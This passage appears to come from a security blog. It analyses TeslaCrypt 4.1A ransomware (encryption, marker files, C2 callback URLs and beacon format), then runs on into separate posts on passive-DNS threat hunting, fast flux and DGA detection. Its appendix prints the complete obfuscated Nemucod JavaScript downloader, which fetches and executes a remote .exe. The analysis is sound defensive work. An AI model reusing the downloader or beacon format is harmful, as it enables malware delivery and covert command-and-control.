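    """Heuristic check of a Run-key value against the TeslaCrypt pattern."""
    return bool(TESLACRYPT_RUN_VALUE.search(value_data))
```

Sweeping collected autorun entries through a check like this is cheap, and the pattern is specific enough that false positives should be rare.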

 

Malicious Mission

TeslaCrypt relies mostly on scare tactics to corner victims into paying the ransom. In reality, it’s making false claims about its encryption usage and has recovery mechanisms that can help users recover files.

 

Encryption

Even though the malware's ransom message claims that the encryption used is RSA-4096, this algorithm is not used in any way. Instead, files are encrypted with AES-256 in CBC mode. The encryption function first generates the various keys using standard elliptic curve secp256k1 libraries, which is typical of bitcoin-related authors. An example of these keys can be seen in the hex view below, which details memory during master key generation. Once generated, the keys are saved in %USERPROFILE%\Documents\desctop._ini and %USERPROFILE%\Documents\-!recover!-!file!-.txt. If the malware detects that a file named "desctop._ini" already exists at the specified path, it will not start key pair generation or encrypt any files, assuming the files have already been encrypted.
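That marker-file behavior cuts both ways: the same files the malware writes are artifacts a hunter can sweep for. A minimal sketch (the filenames are the ones documented above; the helper itself is ours):

```python
from pathlib import Path

def teslacrypt_artifacts_present(documents_dir: str) -> bool:
    """Check a Documents directory for the key files this variant writes.
    Note the malware's own logic: if desctop._ini already exists, it skips
    key generation and encryption entirely."""
    docs = Path(documents_dir)
    return (docs / "desctop._ini").exists() or \
           (docs / "-!recover!-!file!-.txt").exists()
```

Finding either file on a host is a strong signal that this variant has already run there.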

 

secp256k1 functions used for master key generation:

 

Generated Keys

 

Memory during the Master key generation:

 

desctop.ini

 

-!recover!-!file!-.txt

 

Callback Routine

If the binary successfully encrypts the targeted files on the host, it spins off a thread and initiates a callback routine that attempts HTTP POST requests to six different URIs:

loseweightwithmysite[.]com/sys_info.php

helcel[.]com/sys_init.php

thinktrimbebeautiful[.]com[.]au/sys_init.php

lorangeriedelareine[.]fr/sys_init.php

bluedreambd[.]com/inifile.php

onguso[.]com/inifile.php

The requests are formatted as such:

POST http://loseweightwithmysite[.]com/sys_info.php

UserAgent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

*/*

data=550EF3E0F3BC2E175190FA31F0F440EC9FB7F1AA325D2C42645A173A1C19F6F14E291E1C6F3ADB48CFAAABB3EE79E98D43D3F227DB13D3BEFB

955ECAB1500D8C5F76DC27E141CA5EA1855D71C8CEC592702694AD29E2631BBB6AC79734C569F42897765D9E1E3A04DE9784A87

The "data" POST variable is used to transmit data that is used by the threat actor to track their victims. This data includes host configuration information, version information pertaining to the implant, a randomly generated bitcoin address (where the affected user is instructed to direct their ransom payment), and key data needed to initiate a recovery of the encrypted files. This information is placed in a query string format and will be subsequently encrypted and encoded prior to transmission in the POST request:

Sub=[Ping: hardcoded callback mode]&dh=[combination of public and private key data]&addr=[bitcoin address generated at runtime]&size=0&version=[4.1a: hardcoded TeslaCrypt version number]&OS=[OS build number derived from VersionInformation.dwBuildNumber]&ID=[821: appears to be a hardcoded value possibly used to further identify a particular variant]&inst_id=[user ID generated at runtime]

Provided below is a string with sample data:

Sub=Ping&dh=04803B73A04A81984A83DB117D8D2C46678A5C3B828E55D265B0A4413FC248194F26505A967943D9FF05A7B5EC7DBF981BDADEB7702D98EA

BA5D492B6429112FFC1478F386804A9CF31E38821425545563D7BCB9CC2BD46EA4FCAADD4BF473E6BD&addr=18px5E1cPWkEkT67TU14RgZ9g9dWbC3jfr&size=0&version=

4.1a&OS=7601&ID=821&inst_id=D19191ED8D504416
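Assembling the plaintext "Ping" beacon can be sketched as follows. The field names, order, and constant values are taken from the sample above; the helper function itself is hypothetical, and in the real implant the result is AES-encrypted before being placed in the "data" POST variable.

```python
def build_beacon_query(dh: str, addr: str, os_build: int, inst_id: str) -> str:
    """Recreate the plaintext callback query string documented above."""
    fields = [
        ("Sub", "Ping"),         # hardcoded callback mode
        ("dh", dh),              # combined public/private key data
        ("addr", addr),          # bitcoin address generated at runtime
        ("size", "0"),
        ("version", "4.1a"),     # hardcoded TeslaCrypt version number
        ("OS", str(os_build)),   # VersionInformation.dwBuildNumber
        ("ID", "821"),           # hardcoded variant identifier
        ("inst_id", inst_id),    # user ID generated at runtime
    ]
    return "&".join(f"{k}={v}" for k, v in fields)
```

Reconstructing the beacon this way is handy when writing decoders for captured callback traffic: once the AES layer is stripped, the plaintext should match this layout field for field.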

 

The query string will then be AES encrypted:

 

An ASCII representation of the binary output of the AES encryption will then be written to memory:

 

This data will then be attached to the "data" POST variable and transmitted in the request.

If the implant successfully issues a POST request and receives a valid response from the callback server, the thread will terminate. The thread will also terminate if it does not receive a valid response after attempting one request to each of the callback servers.

Aside from the "Ping" mode (designated in the Sub query string variable), the binary also references a separate "Crypted" callback mode, though this mode does not appear to be accessible in this particular variant.

 

User Experience

The ransom information is displayed using 3 methods:

1) HTML page

2) text file

3) PNG image

These files will also be written to disk in nearly every directory on the file system.  The links shown to a real victim reference the victim’s unique ID, which facilitates payment tracking and decryption should the ransom be paid.

 

HTML (-!RecOveR!-xdyxv++.Htm)

 

TXT (-!RecOveR!-xdyxv++.Txt)

 

PNG (-!RecOveR!-xdyxv++.Png)

 

Conclusion

TeslaCrypt 4.1A is indicative of the broader trend we’re seeing in ransomware. While attacks on high-value targets dominate the press, ransomware is increasingly opportunistic as opposed to targeted. These randomized spam campaigns rely on infiltrating a very small percentage of targets, but are still extremely lucrative given their widespread dispersion. The shortened timeframe between variants also reflects the trends in ransomware over the last 6-12 months: the time between variants is shrinking while the sophistication is increasing. This makes reverse engineering the malware more onerous, especially given deception techniques such as misleading researchers into believing RSA-4096 encryption is used when in reality it is AES-256. In short, not only does the spam campaign attempt to deceive potential targets, but TeslaCrypt 4.1A also aims to mislead and stay ahead of researchers attempting to reverse engineer it. Only four months into 2016, as our timeline demonstrates, this may very well be the year of the ransomware attack. These opportunistic attacks can be lucrative and sophisticated, and should increasingly be on the radar of high-value organizations and individuals alike.

 

Appendix

Email Header (email originally forwarded from [redacted].org)

Delivered-To: [redacted]@gmail.com

Received: by [redacted] with SMTP id t129csp1570097vkf;

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

X-Received: by [redacted] with SMTP id g19mr11538193ote.175.1460396977496;

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

Return-Path: <HallimondRandy164@zhongda89.com>

Received: from mail-oi0-f50.google.com (mail-oi0-f50.google.com. )

       by mx.google.com with ESMTPS id 9si7641149ott.222.2016.04.11.10.49.37

       for <[redacted]@gmail.com>

       (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);

       Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

Received-SPF: softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) client-ip=[redacted];

Authentication-Results: mx.google.com;

      spf=softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) smtp.mailfrom=HallimondRandy164@zhongda89.com

Received: by mail-oi0-f50.google.com with SMTP id y204so196057727oie.3

       for <[redacted]@gmail.com>; Mon, 11 Apr 2016 10:49:37 -0700 (PDT)

X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;

       d=1e100.net; s=20130820;

       h=x-original-authentication-results:x-gm-message-state:message-id

        :from:to:subject:date:reply-to:mime-version;

       bh=+IHT+KX3SwGYMwaiqhwtBParNXFx58iS7BjXXX3f3hg=;

       b=aF7RbWAEZMTRaddOFbhKFi9ghacPytB5mK2/YwImzNr2GFAvOyVR6yfsOEk8B3XdKZ

        Oc1kESzLaBtRB2PBS5Se66Utxg4a6TBNAWQanuxMthDFUERgQgaA+xae+7uiKLMYrnJC

        rmdIqEuNJ31hq6EaBBHdSwmtBfSfR4q9s4uOZWCuPI+iIzGAW8aUOHxWVDiZDXJCJOA2

        D8AHo5/yUmosn0zFHUo6nThJF5KQKzgPPaYka9avNhFFXUYwXp9RjUKGN+2MDmoOYnWC

        YoYgxZs275cd7cI1hH27ESf60U8aSvjnhh6q5oTTZgfSdekFAhA+MyY7onvGomj4kzAZ

        ju1A==

X-Original-Authentication-Results: gmr-mx.google.com;       spf=softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) smtp.mailfrom=HallimondRandy164@zhongda89.com

X-Gm-Message-State: AOPr4FUtA2HQqGRu+GdZuu8wADNknK4b73v+HF33ILQuYoMSQUrg45myopzxVcSix38piF2Nek5YQwvPOL2fGuTPayrRew==

X-Received: by [redacted] with SMTP id 10mr7798207otm.47.1460396976918;

       Mon, 11 Apr 2016 10:49:36 -0700 (PDT)

Return-Path: <HallimondRandy164@zhongda89.com>

Received: from dsl-187-156-10-25-dyn.prod-infinitum.com.mx ()

       by gmr-mx.google.com with ESMTP id y20si1822157pfa.2.2016.04.11.10.49.36

       for <[redacted]@gmail.com>;

       Mon, 11 Apr 2016 10:49:36 -0700 (PDT)

Received-SPF: softfail (google.com: domain of transitioning HallimondRandy164@zhongda89.com does not designate [redacted] as permitted sender) client-ip=[redacted];

Message-ID: <[redacted]@[redacted].org>

From: =?UTF-8?B?UmFuZHkgSGFsbGltb25k?= <HallimondRandy164@zhongda89.com>

To: =?UTF-8?B?a2ZkaG5l?= <[redacted]@[redacted].org>

Subject: =?UTF-8?B?UkU6?=

Date: Mon, 11 Apr 2016 12:49:34 -0500

Reply-To: =?UTF-8?B?a2ZkaG5l?= <[redacted]@[redacted].org>

MIME-Version: 1.0

 

JavaScript downloader (Nemucod) 0eec3406dfb374a7df4c2bb856db1625 Contents:

var fuXYgBL="WS";

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!"".replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return"\\w+"};c=1};while(c--){if(k[c]){p=p.replace(new RegExp("\\b"+e(c)+"\\b","g"),k[c])}}return p}("0 1=2;",3,3,("var|XqTfkKcqqex|"+fuXYgBL+"cript").split("|"),0,{}))

function zrISJA(jjcxUlc) {

return "hrsaSzYzlaFzEc";

}

function NZwY(FmoOw,RNqcI) {

var FiPpmI=["ohRoOlCB","\x77"+"\x72\x69","\x74\x65"];FmoOw[FiPpmI[1]+FiPpmI[2]](RNqcI)

}

function jEiG(EJmRb) {

var fVxQNBM=["\x6F\x70"+"\x65\x6E"];EJmRb[fVxQNBM[421-421]]();

}

function wYGJ(HhQGZ,cpllk,bDxjN) {

pHah=HhQGZ;

//QVWzPmJWZVSK

pHah.open(bDxjN,cpllk,false);

}

function yrlc(ikMyP) {

if (ikMyP == 1077-877){return true;} else {return false;}

}

function Sgix(UFQtP) {

if (UFQtP > 155282-909){return true;} else {return false;}

}

function tMlUn(cpqParen,kwDT) {

return "";

}

function UAUJ(jNuMk) {

var nLaSHyDA=["\x73\x65"+"\x6E\x64"];

jNuMk[nLaSHyDA[0]]();

}

function uOFx(JEEUB) {

return JEEUB.status;

}

function eBRRZTo(higo,fYcgC) {

ozMRhEh=[];

ozMRhEh.push(higo.ExpandEnvironmentStrings(fYcgC));

return ozMRhEh[0];

}

function iIeFEEW(eArZ) {

var buDOHaq=("\x72\x65\x73\x70\x6F\x6E*\x73\x65\x42\x6F\x64\x79").split("*");

return eArZ[buDOHaq[0]+buDOHaq[1]];

}

function Ybru(IUgdY,FzFmU) {

var usIIR=("\x54\x6F\x46*\x69\x6C\x65*\x73\x61*\x76\x65").split("*");

var gqfLYpEf=usIIR[344-344];

var FAebRf=usIIR[987-985]+usIIR[309-306]+gqfLYpEf+usIIR[522-521];

var jnEpuJY=[FAebRf];IUgdY[jnEpuJY[788-788]](FzFmU,609-607);

}

function LZZFymKZ(IfJ) {

return IfJ.size;

}

function NpkPo(KefYQK) {

var WEgJ=["\x70\x6F\x73\x69\x74\x69\x6F\x6E"];

return KefYQK[WEgJ[904-904]]=114-114;

}

function MnruB(qpl,HKtRA) {

var nweM=["\x73\x70\x6C\x69\x74"];

return qpl[nweM[0]](HKtRA);

}

function FZyc(WHpHj) {

eTtPIgs=XqTfkKcqqex.CreateObject(WHpHj);

return eTtPIgs;

}

function HrwpH(bNbUPp) {

var nviK=bNbUPp;

return new ActiveXObject(nviK);

}

function OixB(ocfZi) {

var DYsBj="";

T=(159-159);

do {

if (T >= ocfZi.length) {break;}

if (T % (686-684) != (803-803)) {

var WyZLN = ocfZi.substring(T, T+(620-619));

DYsBj += WyZLN;

}

T++;

} while(true);

return DYsBj;

}

var dx="N?B f?z k?V pgWrmeYeAtJiInNgSsbyQojuVnZgNqvqs.7c1oGmb/18s05GQdMXYDc?r EgAoyo4gUlee1.Ycgommq/b8l0XGPdqXkDk?3 S?";

var HC = OixB(dx).split("");

var uzOjdW = ". BrlWfZ e LgzYusBg xe GdXD".split("");

var t = [HC[0].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[1].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[2].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[3].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[4].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4])];

var vvT = wYUkzixLb("hytd");

var iWO = HrwpH(OXbXCAjC("LVLuz"));

var ZeDUTR = ("CWszPMX \\").split("");

var Klbb = vvT+ZeDUTR[0]+ZeDUTR[1];

lSfnmZ(iWO,Klbb);

var xSD = ("2.XMLHTTP BeScUOk kmeQd XML ream St ZFRDIeEL AD aLEesOX O nFcW D").split("");

var ZL = true  , JYcj = xSD[7] + xSD[9] + xSD[11];

var uo = FZyc("MS"+xSD[3]+(65368, xSD[0]));

var Qie = FZyc(JYcj + "B." + xSD[5]+(877821, xSD[4]));

var bfO = 0;

var Z = 1;

var LaxMJRW = 570182;

var n=bfO;

while (true)  {

if(n>=t.length) {break;}

var sp = 0;

var Ijm = ("ht" + " VMOmvKy tp zoysd bcAmbjuL :/"+"/ mxykXfd .e EfmSc x nWCKLh e G nWQWoZV E BulesSto T TRoA").split("");

try  {

var LReHyZt=Ijm[134-129];

var xGARQ=Ijm[801-801]+Ijm[473-471]+LReHyZt;

wYGJ(uo,xGARQ+t[n]+Z, Ijm[12]+Ijm[14]+Ijm[16]); UAUJ(uo);

if (yrlc(uOFx(uo)))  {     

jEiG(Qie); Qie.type = 1; NZwY(Qie,iIeFEEW(uo)); if (Sgix(LZZFymKZ(Qie)))  {

AQVoAgj=/*nrRH29YFVZ*/Klbb/*oVch38RB07*/+LaxMJRW+Ijm[926-919]+Ijm[407-398]+Ijm[742-731];

sp = 545-544;NpkPo(Qie);Ybru(Qie,AQVoAgj);

if (293>50) {

try  {pGMyLfHuk(Klbb+LaxMJRW+Ijm[682-675]+Ijm[590-581]+Ijm[781-770]);

}

catch (gl)  {

};

break;

}

}; Qie.close();

};

if (sp == 1)  {

bfO = n; break;

};

}

catch (gl)  {

};

n++;

};

function lSfnmZ(vRNP,BFDQSl) {

try {vRNP.CreateFolder(BFDQSl);}catch(yMBcZQ){};

}

function pGMyLfHuk(sjrheBIoAMu) {

var FTcKLVxo = MnruB("sqjR=Ws=SYmMxdi=c=LkNYHr=ri"+"=pt=PAiRubzP=.S=ZWNin=he=QKIpiY=l"+"l=zZtYtCg"+"=YQvYvTrd=VHTU", "=");

var zfRKdfpc = FZyc(FTcKLVxo[271-270] + FTcKLVxo[136-133] + FTcKLVxo[214-209] + FTcKLVxo[977-971] + FTcKLVxo[641-633] + FTcKLVxo[928-918]+FTcKLVxo[368-356]);

jxjZabos(zfRKdfpc,sjrheBIoAMu);

}

function/*OAJC*/jxjZabos(TRAYg,GOyvuX) {

var RtpGce= ("JSaOOwisDoL;\x72;\x75;\x6E;JgVDLJItskks").split(";");

var xFr=RtpGce[992-991]+RtpGce[563-561]+RtpGce[696-693];

var VeXb=/*vyYh*/[xFr];

//rATi

TRAYg[VeXb[251-251]](GOyvuX);

}

function wYUkzixLb(rjwBK) {

var kuglrOp = "njDqTN*KHD*pt.S"+"he"+"ll*PzPJjXp*Sc"+"ri*";

var kuMsE = MnruB(kuglrOp+"CLPW*%T"+"E*MP%*\\*yIkarFYNo*nEyAhd*RsGedfF*apQUP", "*");

var TbT=((117-116)?"W" + kuMsE[428-424]:"")+kuMsE[110-108];

var tn = FZyc(TbT);

SvDMQR=kuMsE[255-249]+kuMsE[302-295];

return eBRRZTo(tn,SvDMQR+kuMsE[855-847]);

}

function OXbXCAjC(OceU) {

var ziaeORqzQs = "Sc WGsgmuy r NzOtRcclv ipt"+"ing HjDZRDm uMM ile ybhLPUOzWBGhng";

var fzryoIu = MnruB(ziaeORqzQs+""+"Sys"+"tem Bm hmjQH Obj vQPPEr ect fokQapQ ACJDF", "");

return fzryoIu[0] + fzryoIu[2] + fzryoIu[4] + ".F" + fzryoIu[7] + fzryoIu[9] + fzryoIu[12] + fzryoIu[14];

}
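The string obfuscation in the downloader above is shallow. By our reading of OixB and the subsequent replace calls, the payload URLs in the dx string are recovered by keeping every odd-indexed character (dropping the interleaved junk), swapping the GdXD token for the ".exe" extension, and splitting on "?". A Python sketch of that decoding:

```python
# The obfuscated string from the downloader, verbatim.
dx = ("N?B f?z k?V pgWrmeYeAtJiInNgSsbyQojuVnZgNqvqs.7c1oGmb/18s05GQdMXYDc?r "
      "EgAoyo4gUlee1.Ycgommq/b8l0XGPdqXkDk?3 S?")

def deobfuscate(blob: str) -> list:
    """Keep odd-index characters (OixB drops the even-index junk), restore
    the '.exe' extension, and split the result on '?' into host paths."""
    kept = blob[1::2]
    kept = kept.replace("GdXD", ".exe")
    return [piece.strip() for piece in kept.split("?") if piece.strip()]

print(deobfuscate(dx))
# → ['greetingsyoungqq.com/80.exe', 'google.com/80.exe']
```

The first entry matches the payload URI observed in the campaign; the second appears to be a benign-looking fallback. At runtime the script prepends the "http://" scheme before issuing the request.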

 

 

 


 

 

 

 

 

Hunting on the Cheap, Part 1: The Architecture


As security approaches reliant on known indicators of compromise (IOCs) are increasingly failing, “assume breach” has become a common expression in the industry. Far too often, intrusions go undetected until an external party discovers a breach and notifies the organization. Instead of relying on signature-based solutions or visits from a third party to learn of a problem, network defenders need to “assume breach” from unknown adversaries who are already active within the enterprise. Given the increasingly targeted and personalized nature of attacks, network defenders must expand beyond searching for known IOCs and hunt for unknown breaches within their networks. This systematic pursuit of unknown adversaries is known as cyber adversary hunting.

Hunting is not without its challenges. It is a relatively new and ill-defined concept, and some believe it is beyond their personnel or resource capabilities. Defenders need powerful tools to sift through mountains of data to rapidly detect and deal with a compromise. A full-featured hunt platform dramatically increases a hunter’s power, but security budgets are limited and organizations cannot always invest in every promising technology. Fortunately, there are several ways to hunt “on the cheap.”

At this month’s SANS Threat Hunting and Incident Response Summit, Endgame addressed some of these misperceptions and described ways security professionals can begin hunting without making large, up-front investments. This first of three related posts addresses how to get started hunting on the cheap on your network.  The second post will next address the various open source ways to cheaply analyze and identify high-order trends on networks, and the final post will conclude with a discussion of some easy ways to begin hunting on your hosts.  

 

Limitations of IOC Search

Security at the network level has traditionally involved searching for IOCs, such as known bad domains, blacklisted IPs and sometimes CIDRs, or has relied on using tools such as Snort or Bro to search for signatures associated with malicious traffic. With malicious tradecraft rapidly evolving and adversary infrastructure becoming less static and harder to distinguish from legitimate services, using network IOCs to detect threats has become harder and less effective. In other words, network IOCs are quickly obsolete. Threat actors often monitor their network assets, and as soon as they are detected by a blocklist, they move on to a different endpoint. Some attackers segment infrastructure on a per-target basis, reducing the value of global knowledge of the associated IOCs.

Cloud computing has only accelerated the challenges associated with IOC search. It is very easy for an adversary to obtain IP addresses from one of many hosting providers. Similarly, new ccTLDs and ICANN gTLDs managed by registrars that require little or no background check make this even easier and cheaper (sometimes free), while WHOIS privacy services keep registrations stealthy.

Because of all this and more, a smarter approach is required wherein, instead of chasing the past and searching for the known bad, network defenders hunt for patterns and signals that reveal the unknown bad. Once previously unknown indicators of malicious activity are identified, organizations can activate their standing incident response procedures. 

 

Hunting with Passive DNS

Passive DNS is very good at capturing such signals and patterns in a concise and structured way. Passive DNS is data collected by passively capturing inter-server DNS messages and reassembling them into complete DNS transactions. Florian Weimer proposed this technique at the 17th FIRST conference in 2005 as a way to slow botnet propagation. Since then, a number of security organizations have started collecting passive DNS by placing DNS sensors on geographically diverse networks and analyzing the resulting data to generate threat intelligence. In today’s threat environment, passive DNS can be immensely useful in driving threat hunting.

Passive DNS sensors, in essence, capture DNS traffic – UDP packets to and from port 53 (DNS) – and reassemble all the messages into a single record containing query and responses. We have experimented with two open source sensors:

We have an option to collect only the Iterative DNS queries (shown here in green) or collect all the DNS traffic.

 

DNS query

 

These sensors can be placed at any point in the network where a sniffer like tcpdump can capture DNS traffic. The best place to install a sensor is on a local recursive DNS server, but a span port will also work.

Once the passive DNS data is collected by the sensors, it must be transferred and aggregated to a single point for analysis and monitoring. A message queue like Kafka can be used by the sensors to publish the passive DNS records. This enables a flexible and loosely coupled – and open source! – architecture wherein any number of consumers can subscribe to the queue and perform necessary data analysis for threat hunting.
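A sketch of the consumer side of that architecture follows. We assume records are published to Kafka as JSON; the topic name, record field names, and the kafka-python client are illustrative choices on our part, not requirements of the design.

```python
import json

def parse_record(raw_bytes: bytes) -> dict:
    """Decode one passive DNS record published to the queue.
    The field names here are an assumed schema."""
    record = json.loads(raw_bytes)
    return {
        "qname": record.get("qname", "").rstrip("."),
        "qtype": record.get("qtype", "A"),
        "rcode": record.get("rcode", "NOERROR"),
        "answers": record.get("answers", []),
    }

def consume(topic="passive-dns", servers=("localhost:9092",)):
    """Subscribe to the passive DNS topic and hand each record to analysis.
    Requires the third-party kafka-python package and a running broker."""
    from kafka import KafkaConsumer  # imported lazily: optional dependency
    for message in KafkaConsumer(topic, bootstrap_servers=list(servers)):
        record = parse_record(message.value)
        # ...feed `record` to storage, monitoring, or real-time detection...
        print(record["qname"], record["rcode"])
```

Because every consumer sees the same stream independently, the long-term storage sink, the monitoring counters, and the real-time detectors described below can all run side by side without coordinating with the sensors.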

Broadly, there are three main applications of this data that are relevant for hunting:

 

1. Data Sinks to Long-term Storage

Depending upon the use case, a long-term store like HDFS can enable large-scale batch analysis to discover “what’s normal” for the network and identify historical trends. Alternatively, ingesting the data into an ELK (Elasticsearch, Logstash, Kibana) stack to perform searches and trend analysis is a simpler approach. This quickly enables searching for known IOCs using an open-source stack, while also supporting outlier detection for any deviations from the norm.

 

2. Monitoring

Monitoring various statistics of the DNS traffic, such as the number of NXDOMAIN responses, the number of queries by type, the total number of queries, the number of queries by user, and the distribution of queried TLDs, can be immensely helpful for understanding hourly and daily trends. Monitoring applications like Graphite generate graphs and statistics for these data points, allowing us to proactively identify anything out of the ordinary.
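A minimal sketch of such a stats rollup, using only the standard library (the record schema with `qtype` and DNS response code `rcode` fields is hypothetical; the resulting counts could be shipped to a system like Graphite as per-interval metrics):

```python
from collections import Counter

def dns_stats(records):
    """Summarize one batch of passive DNS records into the metrics
    described above: total queries, queries by type, NXDOMAIN count."""
    return {
        "total_queries": len(records),
        "queries_by_type": Counter(r["qtype"] for r in records),
        "nxdomain_count": sum(1 for r in records if r["rcode"] == 3),
    }

# Toy batch: two A queries (one NXDOMAIN) and one MX query.
batch = [
    {"qtype": "A", "rcode": 0},
    {"qtype": "A", "rcode": 3},   # rcode 3 = NXDOMAIN
    {"qtype": "MX", "rcode": 0},
]
stats = dns_stats(batch)
```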

 

3. Real-time Threat Hunting

These consumers process records as they arrive, continuously looking for malicious traffic patterns and performing outlier detection to catch threats in real time. Time-series analysis, using libraries like Kairos, facilitates the hunt by detecting unusual activity and any breakpoints or periodicity in the data.
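Setting the storage tooling aside, the periodicity piece can be sketched with plain autocorrelation over a count series, for example per-minute queries from one host to one domain. The series and the argmax-based check below are illustrative only:

```python
def best_period(counts, max_lag=None):
    """Return the lag (1..max_lag) with the highest normalized
    autocorrelation -- a crude periodicity check on a count series."""
    n = len(counts)
    max_lag = max_lag or n // 2
    mean = sum(counts) / n
    dev = [c - mean for c in counts]
    denom = sum(d * d for d in dev) or 1.0   # guard constant series

    def r(lag):
        return sum(dev[t] * dev[t + lag] for t in range(n - lag)) / denom

    return max(range(1, max_lag + 1), key=r)

# A host beaconing every 3 minutes produces a strong peak at lag 3.
beacon_counts = [5, 0, 0] * 8
```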

 

 

Message Queue

 

Next Steps

Once the architecture is established and data is being collected, network defenders can conduct a wide range of analyses on this passive DNS data to hunt for unknown intrusions in networks. In our next post, I’ll describe how this architecture can be used to detect newly registered domains, fast flux techniques, domain generation algorithm (DGA) malware, and a variety of other indications of intrusion. Together, these posts will provide an overview of the power of open-source libraries and techniques for hunting on the cheap.

Hunting on Networks, Part 2: Higher-Order Patterns


In the first part of the Hunting on the Cheap series, I discussed the importance of passive DNS in an adversary hunting toolkit. I detailed how an organization can set up sensors to collect passive DNS data, as well as some of the options for handling this data. After putting that foundation in place, the next step is examining the collected data for patterns and signals of maliciousness that, with a relatively low false positive rate, give the hunter starting points to dig deeper and identify unknown threats. A focus on these outliers and other patterns is important because adversaries easily change their attack infrastructure, rendering most network IOCs useless.

In this second post in our Hunting on the Cheap series, I will go through some of these signals and discuss how they can be applied to passive DNS data to hunt for unknown malicious adversaries in your network.

 

Fast Flux

Fast flux is a technique used most frequently for malicious purposes by botnets. Normally, a fully qualified domain name (FQDN) resolves to the same address space for a relatively long period of time. With fast flux, a FQDN serving as a command and control server resolves to a large number of IPs over time, swapping them in and out at high frequency. This adds resilience against IP-based block lists, because blocking a given IP is effective only for the very short window during which the FQDN resolves to that IP. This pattern isn’t malicious by itself; a domain that receives a large amount of traffic may also resolve to a large number of IPs. Typically, though, benign domains resolve to a homogeneous IP space by ownership, address block, and geography, while malicious domains show greater heterogeneity in each. This is the first higher-order pattern: ‘domains that resolve to a large number of IPs, where those IPs are diverse both by ownership and geography’. For example, looking for this pattern in our sample data revealed the domains listed below. VirusTotal confirms that they are indeed malicious.
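A rough sketch of this diversity test, using the standard library: distinct /16 networks stand in for ownership and geographic diversity (a real hunt would join ASN and GeoIP data), and the `min_ips` cutoff is a hypothetical threshold, not an established one:

```python
import ipaddress

def fast_flux_score(resolutions, min_ips=10):
    """Flag a domain whose A-record answers span many IPs across
    many distinct /16 networks over the observation window."""
    ips = {ipaddress.ip_address(ip) for ip in resolutions}
    nets = {ipaddress.ip_network(f"{ip}/16", strict=False) for ip in ips}
    return len(ips) >= min_ips and len(nets) >= min_ips // 2

# Hypothetical answers observed for one FQDN over a day.
flux_ips = [f"{a}.{b}.10.{c}" for a, b, c in
            [(5, 12, 9), (91, 200, 4), (41, 77, 3), (103, 4, 8),
             (24, 9, 1), (62, 30, 7), (77, 88, 2), (185, 3, 6),
             (201, 55, 5), (13, 107, 11)]]
stable_ips = ["93.184.216.34", "93.184.216.35"]
```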

Author: Ahuja

Domain Generation Algorithm

Domain Generation Algorithm (DGA) malware uses an algorithm to generate thousands of pseudo-random domains daily and attempts to connect to them to receive communications from a controller. Botnet masters register a (usually small) subset of those domains per day to keep the botnet going, knowing that the malware will eventually attempt to resolve a registered domain. A well-known and effective way to stop DGA malware is to predict and register all possible domains before the botnet controller does. This requires reverse engineering many malware samples, which can be tedious, and it is difficult to remain current given new malware families and their constantly updated versions. So how do we determine whether a given domain in passive DNS data is generated via a DGA without enumerating every possible domain from every possible algorithm, which would be an extremely difficult task?

Fortunately, algorithmically generated domains have structural properties that differ from benign domains. Benign domains are generally chosen because they are easy to remember or reflect common words across a variety of languages. That is our next higher-order pattern: ‘domains with abnormal lexicographical structure’.

One fairly accurate approach to detecting DGA domains is to extract features like consonant-to-vowel ratio, longest consonant sequence, entropy, and common n-grams with dictionary words, and then train a random forest classifier on them.
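A sketch of the feature-extraction step, standard library only (the classifier itself, e.g. a random forest from scikit-learn, would be trained on these feature dictionaries and is omitted here):

```python
import math
from collections import Counter

VOWELS = set("aeiou")

def dga_features(domain):
    """Lexical features of the kind fed to a DGA classifier."""
    name = domain.split(".")[0].lower()
    letters = [c for c in name if c.isalpha()]
    vowels = sum(1 for c in letters if c in VOWELS)
    consonants = len(letters) - vowels

    # Longest run of consecutive consonants.
    longest, run = 0, 0
    for c in name:
        run = run + 1 if c.isalpha() and c not in VOWELS else 0
        longest = max(longest, run)

    # Shannon entropy of the character distribution.
    counts = Counter(name)
    entropy = -sum((n / len(name)) * math.log2(n / len(name))
                   for n in counts.values())

    return {"cv_ratio": consonants / max(vowels, 1),
            "longest_consonant_run": longest,
            "entropy": entropy}
```

A DGA-looking name such as `xkqzvbnrtw.com` scores higher on all three features than a dictionary-word domain such as `google.com`.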

This data science approach to DGA detection is non-trivial to implement. We have provided code which can be used for detection. This specific classifier distinguishes abnormal lexicographical structures from common English words. Similar approaches can incorporate other languages and reduce the false positive rate.

 

Author: Ahuja

While block lists are appropriate for hunting a given fast flux botnet, they are not the right technique for hunting DGA domains in general. Because of the sheer number of domains per day per malware family, and the rapidly changing malware samples, static analysis is inefficient and less effective for hunting DGA domains. However, data science techniques such as random forest classification are very well suited for hunting DGA domains.

 

NXDOMAINs

DGA domains sometimes include English words to fool DGA classifiers that rely on lexicographical properties of the domain; the Nivdort family is one example. However, DGA malware leaves behind another signal that is much harder to conceal. Since the malware generates thousands of domains and only a few of them resolve to actual hosts, the majority of its DNS queries return an error (response code 3) indicating a non-existent domain, or NXDOMAIN. Normally, we see NXDOMAINs due to typos, copy-paste errors, browser prefetch of malformed HTML, and the like at a rate of less than 5% of DNS queries. On machines infected by DGA malware, this rate surges. ‘A higher than normal rate of NXDOMAIN errors’ is the next higher-order pattern. Monitoring the percentage of NXDOMAINs is powerful because it catches all sorts of DGA malware families even if they evade our DGA classifier.
